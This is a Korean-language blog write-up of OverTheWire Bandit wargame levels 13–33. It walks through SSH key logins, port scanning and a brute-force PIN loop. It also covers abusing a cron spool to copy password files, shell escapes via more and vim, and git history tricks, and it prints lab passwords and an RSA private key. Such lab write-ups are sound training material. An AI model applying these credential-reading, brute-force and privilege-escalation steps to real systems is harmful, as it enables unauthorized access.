[Bandit]OverTheWire

📋│Study/😘│🤔Security Mentoring

[Bandit]OverTheWire - Part 2

Jastes 2023. 8. 23. 00:00

WriteUp

Level13

저장된 위치는 /etc/bandit_pass/bandit에 있는데 우리가 읽을 순 없고,
대신 private SSH key을 이용해 확인 할 수 있다고 합니다.

$ ssh bandit13@bandit.labs.overthewire.org -p 2220

$ ls -al
total 24
drwxr-xr-x  2 root     root     4096 Apr 23 18:04 .
drwxr-xr-x 70 root     root     4096 Apr 23 18:05 ..
-rw-r--r--  1 root     root      220 Jan  6  2022 .bash_logout
-rw-r--r--  1 root     root     3771 Jan  6  2022 .bashrc
-rw-r--r--  1 root     root      807 Jan  6  2022 .profile
-rw-r-----  1 bandit14 bandit13 1679 Apr 23 18:04 sshkey.private

# local desktop PC env
$ scp -P 2220 bandit13@bandit.labs.overthewire.org:sshkey.private .
$ chmod 400 sshkey.private
$ ssh -i sshkey.private bandit14@bandit.labs.overthewire.org -p 2220

# remote bandit14 level
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14

[Next Level]
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq

Explanation(Keyword)
위와 같이 로그인

scp 명령어가 위에 다운로드를 도와주며, ssh의 -i라는 옵션을 통해 RSA 로그인 방식으로 접근합니다.

참고자료

리눅스 scp 사용법 - 제타위키

다음 문자열 포함...

zetawiki.com

SSH/OpenSSH/Keys - Community Help Wiki

Parent page: Internet and Networking >> SSH Public and Private Keys Public key authentication is more secure than password authentication. This is particularly important if the computer is visible on the internet. If you don't think it's important, try log

help.ubuntu.com

Level14

현제 레벨의 비번을 로컬 포트 30000에 기입하면 비번을 알려준다고 하네요

# nc(netcat)
$ ssh -i sshkey.private bandit14@bandit.labs.overthewire.org -p 2220

bandit14@bandit:~$ cat /etc/bandit_pass/bandit14 | nc localhost 30000
Correct!

# or telnet use..
$ telnet bandit.labs.overthewire.org 30000
Trying 127.0.0.1...
Connected to bandit.labs.overthewire.org.
Escape character is '^]'.
# -- bandit14 password --
Correct!

[Next Level]
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt

Explanation(Keyword)
telnet이나 nc 명령어를 이용하여 위의 비번을 기입하면 다음 레벨로

nc는 리다이렉션이 가능하답니다.

Level15

SSL 암호화를 사용하여 localhost의 포트 30001에 현제 레벨의 암호를 제출하랍니다.

$ cat /etc/bandit_pass/bandit15 | openssl s_client -connect localhost:30001 -ign_eof
CONNECTED(00000003)
depth=0 CN = localhost
...
...
notAfter=Aug 16 16:05:30 2023 GMT
verify return:1
---
...
...
read R BLOCK
Correct!

[Next Level]
JQttfApK4SeyHwDlI9SXGR50qclOAil1

Explanation(Keyword)
openssl s_client는 OpenSSL 유틸리티의 하나로, TLS/SSL로 암호화된 서버에 접속하여 SSL/TLS 세션을 설정하고 디버깅 및 테스트를 수행하는데 사용되는 명령어입니다.

-ign(ore)_eof(end of file)로써 클라측에서 eof 문자를 보낼 시 세션 종료하지 말고 기달리는 명령

참고자료

OpenSSL Cookbook 3rd Edition

www.feistyduck.com

Transport Layer Security - Wikipedia

From Wikipedia, the free encyclopedia Cryptographic protocols for securing data in transit Transport Layer Security (TLS) is a cryptographic protocol designed to provide communications security over a computer network. The protocol is widely used in applic

en.wikipedia.org

OpenSSL 자주 쓰는 명령어(command) 및 사용법, tip 정리

-----BEGIN ENCRYPTED PRIVATE KEY----- MIIFHzBJBgkqhkiG9w0BBQ0wPDAbBgkqhkiG9w0BBQwwDgQITJWLw/UHoM0CAggA

www.lesstif.com

Level16

현재 비번을 포트 31000-32000사이에 열려있는 포트를 찾고,
SSL이 되어 있는(수신되는 서버 포트는 하나임) 곳을 찾아 넣어라네요

#open port find solve_1
bandit16@bandit:~$nmap -p 31000-32000 localhost
Nmap scan report for localhost (127.0.0.1)
Not shown: 996 closed ports

PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown


#open port find solve_2(reference)
... (echo > /dev/tcp/localhost/port) >& /dev/null && checking
... nc -vz localhost 31000-32000 | grep "succeeded!" (answer error to send..)


$ cat /etc/bandit_pass/bandit16 | openssl s_client -connect localhost:31790 -ign_eof
CONNECTED(00000003)
...
...
---
read R BLOCK
Correct!(import!!)

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----


#RSA method ssh connect
bandit16@bandit:~$ mkdir /tmp/Jastes
bandit16@bandit:~$ chmod 700 /tmp/Jastes
bandit16@bandit:~$ vi /tmp/Jastes/.sshkey.private
bandit16@bandit:~$ chmod 600 /tmp/Jastes/.sshkey.private

$ ssh -i /tmp/Jastes/.sshkey.private bandit17@bandit.labs.overthewire.org -p 2220

[Next Level]
...

Explanation(Keyword)
openssl s_client는 OpenSSL 유틸리티의 하나로, TLS/SSL로 암호화된 서버에 접속하여 SSL/TLS 세션을 설정하고 디버깅 및 테스트를 수행하는데 사용되는 명령어입니다.

ssh의 -i라는 옵션을 통해 RSA 로그인 방식으로 접근합니다.

참고자료

SSH/OpenSSH/Keys - Community Help Wiki

help.ubuntu.com

Level17

password.old와 new의 차이점이 바로 다음 단계의 비번이라고 하네요.
참고로 "Bytebye!"는 19레벨과 연관(?) 있어요

bandit17@bandit:~$ ls -al
total 36
drwxr-xr-x  3 root     root     4096 Apr 23 18:04 .
drwxr-xr-x 70 root     root     4096 Apr 23 18:05 ..
-rw-r-----  1 bandit18 bandit17 3300 Apr 23 18:04 passwords.new
-rw-r-----  1 bandit18 bandit17 3300 Apr 23 18:04 passwords.old

bandit17@bandit:~$ diff passwords.old passwords.new
42c42
< glZreTEH1V3cGKL6g4conYqZqaEj0mte
---
....

[Next Level]
hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg

Explanation(Keyword)
diff는 각 파일(2개) 차이점을 확인하는 명령어입니다.

Level18

homedir에 readme라는 파일에 정답이 있지만 .bashrc(리눅스 쉘 환경 설정)을 건들렸어요..
그래서 접속 시 계속 팅긴다는군

#failure
$ ssh bandit18@bandit.labs.overthewire.org -p 2220 && cat readme
Byebye !
Connection to bandit.labs.overthewire.org closed.
cat: ./readme: No such file or directory

#Success
$ ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat ./readme"
...

[Next Level]
awhqfNnAbc1naukrpqDYcF95h7HoMTrC

Explanation(Keyword)
SSH에 문자열을 추가하여 ssh명령어에 명령어를 직접 실행하기

Level19

homedir에 setuid^[각주:1]에 접근에 인자를 통해 확인하라는거 같네요

bandit19@bandit:~$ ls -al
total 36
drwxr-xr-x  2 root     root      4096 Apr 23 18:04 .
drwxr-xr-x 70 root     root      4096 Apr 23 18:05 ..
-rwsr-x---  1 bandit20 bandit19 14876 Apr 23 18:04 bandit20-do

bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
....

[Next Level]
VxCazJaVykI6W36BkBU0mJTCM8rR95XT

Explanation(Keyword)
설명할 부분이나 키워드는 딱히 없네요

참고자료

Setuid - Wikipedia

From Wikipedia, the free encyclopedia Unix access rights flag "SGID" redirects here. For the company which briefly used this stock ticker symbol, see Silicon Graphics. The Linux and Unix access rights flags setuid and setgid (short for set user identity an

en.wikipedia.org

Trainer

더보기 💡Trainer 비번 root - hackerschool │guest - guest │trainer1 - trainer1│trainer2 - linuxer│trainer3 - compute trainer4 - mungguta│trainer5 - goodluck│trainer6 - coffee│trainer7 - to the top│trainer8 - player trainer9 - programm

dystopia050119.tistory.com

Level20

TCP를 사용하여 localhost의 지정된 포트에 연결,
현재 레벨의 비번을 수신하면 정답이 나온다고 기재되어 있네요

$ ./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. 
If it receives the correct password from the other side, 
the next password is transmitted back.

#background running
$ nc -lp 1234 < /etc/bandit_pass/bandit20 &

$ ./suconnect 1234
Read: VxCazJaVykI6W36BkBU0mJTCM8rR95XT
Password matches, sending next password
....

[Next Level]
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq

Explanation(Keyword)
터미널을 두개로써 첫번째는 해당 포트에 입력 부분(리다이렉션에 &(백그라운드 실행))으로 진행 & 수신기하고 두번째는 해당 Setuid를 실행해 해당 포트를 연하여 열도록 만든다.

Level21

cron^[각주:2]을 배울건데 /etc/cron.d/에서 확인 한 번 해보라네요

#editer checking
bandit21@bandit:~$ vi /etc/cron.d/
...
.placeholder
cronjob_bandit15_root
cronjob_bandit17_root
cronjob_bandit22
cronjob_bandit23
cronjob_bandit24
cronjob_bandit25_root
...


bandit21@bandit:~$ vi /etc/cron.d/cronjob_bandit22
...
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
...


bandit21@bandit:~$ vi /usr/bin/cronjob_bandit22.sh
....
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
....

#solve
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
....

[Next Level]
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff

Explanation(Keyword)

cronjob_bandit22.sh에 대한 정보를 읽어보세요

참고자료

리눅스 반복 예약작업 cron, crond, crontab - 제타위키

1 개요[ | ] cron, cronie, crond, cron daemon, crontab, cron job, crontab job 크론, 크론 데몬, 크론탭, 크론작업, 리눅스 작업 스케줄러 /usr/sbin/crond /usr/bin/crontab 프로세스 예약 데몬 리눅스용 작업 스케줄러 특정

zetawiki.com

Level22

cron^[각주:3]을 배울건데 /etc/cron.d/에서 확인 한 번 해보라네요

#editer checking
bandit22@bandit:~$ vi /etc/cron.d/
...
.placeholder
cronjob_bandit15_root
cronjob_bandit17_root
cronjob_bandit22
cronjob_bandit23
cronjob_bandit24
cronjob_bandit25_root
...
# ... same bandit 21 logic step ...

bandit22@bandit:~$ vi /usr/bin/cronjob_bandit23.sh
....
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
....

#solve
bandit22@bandit:~$ echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
....

[Next Level]
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G

Explanation(Keyword)

md5sum으로 위에 "I am user $myname"을 md5로 암호화시킨 후, 저장위치로 해당값을 이용

참고자료

리눅스 반복 예약작업 cron, crond, crontab - 제타위키

zetawiki.com

Level23

cron^[각주:4]을 배울건데 /etc/cron.d/에서 확인 후 직접 만들어보기!!

#editer checking
bandit23@bandit:~$ vi /etc/cron.d/
...
.placeholder
cronjob_bandit15_root
cronjob_bandit17_root
cronjob_bandit22
cronjob_bandit23
cronjob_bandit24
cronjob_bandit25_root
...
# ... same bandit 21, 22 logic step ...


bandit23@bandit:~$ vi /usr/bin/cronjob_bandit24.sh
--------------------
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo || exit 1
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -rf ./$i
    fi
done
----------------------


#solve
bandit23@bandit:/$ mkdir /tmp/problem/
bandit23@bandit:/$ cd /tmp/problem
bandit23@bandit:/tmp/problem$ vi exploit.sh
------------
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/problem/bandit24_password
------------

bandit23@bandit:/tmp/problem$ chmod 777 exploit.sh
bandit23@bandit:/tmp/problem$ chmod 777 /tmp/problem
bandit23@bandit:/tmp/problem$ cp ./exploit.sh /var/spool/bandit24/foo
...(1 minte later)

bandit23@bandit:/tmp/problem$ ls
bandit24_password  exploit.sh
bandit23@bandit:/tmp/problem$ cat bandit24_password
...

[Next Level]
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

Explanation(Keyword)
/var/spool/bandit24에 있는 모든 스크립트를 실행하고 삭제함
자체 스크립트를 작성하고 /var/spool/bandit24에 복사 후 결과를 기다리기

참고자료

리눅스 반복 예약작업 cron, crond, crontab - 제타위키

zetawiki.com

Level24

데몬^[각주:5]로 포트 30002에 수신 대기 중으로 비번을 알려주며,
현재 암호와 비밀 숫자 4자리 핀 코드가 제공되면 다음 단계로 넘어간다고 합니다.

10000을 모두 시도.. 즉, brute-force(무차별 대입 공격)을 시도 하는 겁니다.

bandit24@bandit:~$ cd /tmp/problem #before make this file..

# solv_1
bandit24@bandit:/tmp/problem$ vi bandit24_exploit.sh
-----------------------
#!/bin/bash

Pass="VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar"

for i in {0000..9999}
do
        if echo $Pass $i | nc localhost 30002 | grep Wrong > /dev/null
        then
                echo `Search awnser... $i`
        else
                echo $Pass $i | nc localhost 30002
                exit
        fi
done
-----------------------
bandit24@bandit:/tmp/problem$ chmod +x bandit24_exploit.sh 
bandit24@bandit:/tmp/problem$ ./bandit24_exploit.sh
# .... too.. slow :(

#solv_2
bandit24@bandit:/tmp/problem$ vi make_pass.sh
bandit24@bandit:/tmp/problem$ touch list.txt
-----------------------
#!/bin/bash
pwd="VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar"

for i in {0000..5000}
do
    echo $pwd $i >> /tmp/list24
done
------------------------
#!/bin/bash
pwd="VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar"

for i in {5000..9999}
do
    echo $pwd $i >> /tmp/list24
done
-----------------------
bandit24@bandit:/tmp/problem$ chmod +x make_pass.sh
bandit24@bandit:/tmp/problem$ cat list.txt | nc localhost 30002 | grep -v Wrong

I am the pincode checker for user bandit25. 
Please enter the password for user bandit24 and the secret pincode on a single line, 
separated by a space. Correct!
The password of user bandit25 is ...

Exiting.

# pwnable meking to python code.. I didn't find solve script.. comming soon!!(?)

[Next Level]
p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d

Explanation(Keyword)
solv2에서 password list가 너무 길어서 적용이 안되는 경우가 있기에 나누어 기입하세요
나머지 solv는 준비 중 혹은 너무 느려서 추천하지는 않아요

참고자료

pwntools로 풀이 코드(적용이 안되던데..)

Level25-26

로그인을 하는데 26렙은 /bin/bash를 사용하지 않는다는 점(쉘이 아닌가?)
그 부분만 알고 다른 부분을 찾아보랍니다.

bandit25

bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

bandit25@bandit:~$ vi /usr/bin/showtext
-----------------------
#!/bin/sh

export TERM=linux

exec more ~/text.txt
exit 0
-----------------------
bandit25@bandit:~$ ls
bandit26.sshkey

bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost -p 2220
# we need more option it's explained below
# more max height = 6

  _                     _ _ _   ___   __
 | |                   | (_) | |__ \ / /
 | |__   __ _ _ __   __| |_| |_   ) / /_
--More--(50%)

# press "v" or :!(command)
# we follow step is if press "v" solution script
# Then, in vi type ':e /etc/bandit_pass/bandit26'
---------------------------
c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1 #Success!!
...
...
---------------------------

딱히 설명할 부분은 없는거 같네요..

bandit26

# vim
---------------------
.... 
....
:set shell=/bin/bash #set(valuable setting)
:shell #shell
----------------------
bandit26@bandit:~$ id
uid=11026(bandit26) gid=11026(bandit26) groups=11026(bandit26)

bandit26@bandit:~$ ls -al
total 44
drwxr-xr-x  3 root     root      4096 Apr 23 18:04 .
drwxr-xr-x 70 root     root      4096 Apr 23 18:05 ..
-rwsr-x---  1 bandit27 bandit26 14876 Apr 23 18:04 bandit27-do
-rw-r-----  1 bandit26 bandit26   258 Apr 23 18:04 text.txt

bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
...

[Next Level]
bandit25 : c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1
bandit26 : YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS

Explanation(Keyword)
solv2에서 password list가 너무 길어서 적용이 안되는 경우가 있기에 나누어 기입하세요
나머지 solv는 준비 중 혹은 너무 느려서 추천하지는 않아요

level25-26는 연계되어 진행됩니다.

참고자료

more(1) - Linux manual page

more(1) — Linux manual page MORE(1) User Commands MORE(1) NAME top more - display the contents of a file in a terminal SYNOPSIS top more [options] file ... DESCRIPTION top more is a filter for paging through text one s

man7.org

Vim documentation: editing

vimdoc.sourceforge.net

How to specify shell for vim?

Can I specify my shell for vim? I'm running OS X and have zsh installed via Homebrew and am using MacVim. When I type shell in MacVim, the shell opens up as bash. How can I have it open as zsh?

superuser.com

Level27

위에 링크에 접속하여 bandit27-git를 얻어서 넘어갑시다.

bandit27@bandit:~$ mkdir /tmp/prob
bandit27@bandit:~$ cd /tmp/prob
bandit27@bandit:/tmp/prob$ chmod 777 /tmp/prob

/tmp/prob$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 
([127.0.0.1]:2220)' can't be established.
....
....
bandit27-git@localhost's password:
remote: Enumerating objects: 3, done.
Receiving objects: 100% (3/3), done.
....
....

bandit27@bandit:/tmp/repo27$ ls
repo
bandit27@bandit:/tmp/repo27$ cd repo
bandit27@bandit:/tmp/repo27$ ls
README
bandit27@bandit:/tmp/repo27/repo$ cat README
...

[Next Level]
AVanL161y9rsbcJIsFHuw35rjaOM19nR

Explanation(Keyword)
tmp에 저장하고 수정할 수 있는 권한이 있으므로 그쪽에서 해야되네요 ㅠㅠ

참고자료

Git/Github 사용법 간단 정리

Git : version control system Github : remote repository

velog.io

[GIT] ⚡️ git 개념 & 원리 (그림으로 알기쉽게 비유 😃)

Git 이란 무엇인가? Git이란 분산형 버전 관리 시스템(Version Control System) 의 한 종류이며, 빠른 수행 속도에 중점을 둔다. 우리가 레포트를 제출한다고 가정했을때, 처음에 저장했을때 'report.txt'라

inpa.tistory.com

Level28

위에 링크에 접속하여 bandit28-git를 얻어서 넘어갑시다.

bandit28@bandit:~$ mkdir /tmp/repo28
bandit28@bandit:~$ cd /tmp/repo28
...(same bandit27 logic)...

#step 1
bandit28@bandit:/tmp/repo28/repo$ vi README.md
--------------------------
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx
----------------------------

#step 2
bandit28@bandit:/tmp/repo28/repo$ git log
------------------------------------------------------------
commit 24ad07097ab1bdc12dfbd4bfe854d06fb6f0ccbe (HEAD -> master)
Author: Morla Porla <morla@overthewire.org>
Date:   Sun Apr 23 18:04:39 2023 +0000

    fix info leak

commit abcff758fa6343a0d002a1c0add1ad8c71b88534
Author: Morla Porla <morla@overthewire.org>
Date:   Sun Apr 23 18:04:39 2023 +0000

    add missing data

commit c0a8c3cf093fba65f4ee0e1fe2a530b799508c78
Author: Ben Dover <noone@overthewire.org>
Date:   Sun Apr 23 18:04:39 2023 +0000

    initial commit of README.md
---------------------------------------------------------------

#step 3
bandit28@bandit:/tmp/repo28/repo$ git revert 24ad07097ab1bdc12dfbd4bfe854d06fb6f0ccbe
bandit28@bandit:/tmp/repo28/repo$ cat README.md
---------------------------------------------------------------
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: ***********
---------------------------------------------------------------

[Next Level]
tQKvmcwNYcFS6vmPHIUSI3ShmsrQZK8S

Explanation(Keyword)
tmp에 저장하고 수정할 수 있는 권한이 있으므로 그쪽에서 해야되네요 ㅠㅠ
또한 revert라는 깃 명령어로 되돌리는 키워드!!

참고자료

'git' 카테고리의 글 목록 (4 Page)

에이블디의 공식 기술블로그 입니다. 에이블디는 지속적으로 성장가능한 개발자를 육성하는 코딩학원입니다.

abled.tistory.com

Git/Github 사용법 간단 정리

Git : version control system Github : remote repository

velog.io

Level29

위에 링크에 접속하여 bandit29-git를 얻어서 넘어갑시다.

# ...(step is same)...
bandit29@bandit:/tmp/repo29/repo$ cat README.md
---------------------------------------------------
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>
---------------------------------------------------

#step 1
bandit29@bandit:/tmp/repo29/repo$ git log
---------------------------------------------------
commit 4bd5389f9f2b9e96ba517aa751ee58d051905761 (HEAD -> master, origin/master, origin/HEAD) #branch change
Author: Ben Dover <noone@overthewire.org>
Date:   Sun Apr 23 18:04:40 2023 +0000

    fix username

commit 1a57cf10158f133c4f40ff82251f605a7618631d
Author: Ben Dover <noone@overthewire.org>
Date:   Sun Apr 23 18:04:40 2023 +0000

    initial commit of README.md
---------------------------------------------------

#step 2
bandit29@bandit:/tmp/repo29/repo$ git branch -r #-r is remote branch list
---------------------------------------------------
  origin/HEAD -> origin/master
  origin/dev
  origin/master
  origin/sploits-dev
---------------------------------------------------

#step 3
bandit29@bandit:/tmp/repo29/repo$ git checkout dev
Branch 'dev' set up to track remote branch 'dev' from 'origin'.
Switched to a new branch 'dev'

bandit29@bandit:/tmp/repo29/repo$ cat README.md
---------------------------------------------------
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: **************
---------------------------------------------------

[Next Level]
xbhV3HpNGlTIdnjUrdAlPzc2L6y9EOnS

Explanation(Keyword)
tmp에 저장하고 수정할 수 있는 권한이 있으므로 그쪽에서 해야되네요 ㅠㅠ
checkout은 branch를 변경하는 명령어입니다.

참고자료

'git' 카테고리의 글 목록 (4 Page)

에이블디의 공식 기술블로그 입니다. 에이블디는 지속적으로 성장가능한 개발자를 육성하는 코딩학원입니다.

abled.tistory.com

Git/Github 사용법 간단 정리

Git : version control system Github : remote repository

velog.io

Level30

위에 링크에 접속하여 bandit30-git를 얻어서 넘어갑시다.

# ...(step is same)...
bandit30@bandit:/tmp/bandit30/repo$ ls
README.md
bandit30@bandit:/tmp/bandit30/repo$ cat README.md
just an epmty file... muahaha

#step 1
bandit30@bandit:/tmp/bandit30/repo$ git tag
secret

bandit30@bandit:/tmp/bandit30/repo$ git show secret
***********


#step 1-1
bandit30@bandit:/tmp/bandit30/repo$ git show-ref --tags
831aac2e2341f009e40e46392a4f5dd318483019 refs/tags/secret

bandit30@bandit:/tmp/bandit30/repo$ git show 831aac2e2341f009e40e46392a4f5dd318483019
************

[Next Level]
OoffzGDlzhAlerFJ2cAiz1D41JW1Mhmt

Explanation(Keyword)
tmp에 저장하고 수정할 수 있는 권한이 있으므로 그쪽에서 해야되네요 ㅠㅠ
tag는 버전등을 표현하기 위한 읽기 전용 깃헙 명령어입니다.

참고자료

'git' 카테고리의 글 목록 (4 Page)

에이블디의 공식 기술블로그 입니다. 에이블디는 지속적으로 성장가능한 개발자를 육성하는 코딩학원입니다.

abled.tistory.com

Git/Github 사용법 간단 정리

Git : version control system Github : remote repository

velog.io

⚡️ GIT 핵심 명령어 요약 총정리 모음

git 초기 설정 🔰 # 현재 위치에서 지역 저장소를 생성 $ git init 🔰 # 깃 환경에서 사용자 이름을 [사용자명]으로 지정 $ git config --global user.name "[사용자명]" 🔰 # 깃 환경에서 사용자 이메일을 [사

inpa.tistory.com

Level31

위에 링크에 접속하여 bandit30-git를 얻어서 넘어갑시다.

# ...(step is same)...
bandit31@bandit:/tmp/bandit31$ cat README.md
--------------------------------------------
This time your task is to push a file to the remote repository.

Details:
    File name: key.txt
    Content: 'May I come in?'
    Branch: master
--------------------------------------------

#step 1
bandit31@bandit:/tmp/bandit31$ git show
# I've summarized it to show only the essentials
--------------------------------------------
+++ b/.gitignore
@@ -0,0 +1 @@
+*.txt

+++ b/README.md
...
--------------------------------------------

#step 2
bandit31@bandit:/tmp/bandit31$ echo 'May I come in?' > key.txt
bandit31@bandit:/tmp/bandit31$ git add -f key.txt
bandit31@bandit:/tmp/bandit31$ git status
--------------------------------------------
....
On branch master
Your branch is up to date with 'origin/master'.

Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
        new file:   key.txt
....
--------------------------------------------

bandit31@bandit:/tmp/bandit31$ git commit -m 'key_txt remote upload'
--------------------------------------------
....
[master 5798d84] key_txt remote upload
 1 file changed, 1 insertion(+)
 create mode 100644 key.txt
....
--------------------------------------------

#step 3
bandit31@bandit:/tmp/bandit31$ git status
--------------------------------------------
....
On branch master
Your branch is ahead of 'origin/master' by 1 commit.
  (use "git push" to publish your local commits)

nothing to commit, working tree clean
....
--------------------------------------------
bandit31@bandit:/tmp/bandit31$ git push origin master
#-u Option to connect semi-permanently (i.e. used when continuing to use)
--------------------------------------------
bandit31-git@localhost's password:
....
.....
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: ***********************
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost:2220/home/bandit31-git/repo
--------------------------------------------

[Next Level]
rmCBvG56y58BXzv98yZGdO7ATVL5dW8y

Explanation(Keyword)
tmp에 저장하고 수정할 수 있는 권한이 있으므로 그쪽에서 해야되네요 ㅠㅠ
.gitignore는 지정된 파일 등을 깃에 올리는 걸 제외하는 명령어입니다.
git add -f 명령어는 Git에서 강제로 파일을 스테이징 영역(Staging Area)에 추가 명령어!

참고자료

'git' 카테고리의 글 목록 (4 Page)

에이블디의 공식 기술블로그 입니다. 에이블디는 지속적으로 성장가능한 개발자를 육성하는 코딩학원입니다.

abled.tistory.com

Git/Github 사용법 간단 정리

Git : version control system Github : remote repository

velog.io

⚡️ GIT 핵심 명령어 요약 총정리 모음

inpa.tistory.com

Level32

깃을 탈출하는 다른 방법을 찾아보아요.. 행운을 빌며!!

WELCOME TO THE UPPERCASE SHELL
>>

#step 1
>> ls
sh: 1: LS: Permission denied
>> $SHELL
WELCOME TO THE UPPERCASE SHELL
>> $HOSTNAME
>> $PATH
sh: 1: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
:/bin:/usr/games:/usr/local/games:/snap/bin: not found #don't is shell is number 1

#step 2
>> $0
$ id
uid=11033(bandit33) gid=11032(bandit32) groups=11032(bandit32)
$ cat /etc/bandit_pass/bandit33
***********

[Next Level]
odHo63fHiFqcWWJG9rLiLDtPm45KzUKy

Explanation(Keyword)
이 부분은.. 추론?의 영역이라 딱히 할 말이 없네요

Level33

현재로썬 문제가 없다네요?(접속 되는데?)

bandit33@bandit:~$ ls -al
total 24
drwxr-xr-x  2 root     root     4096 Apr 23 18:04 .
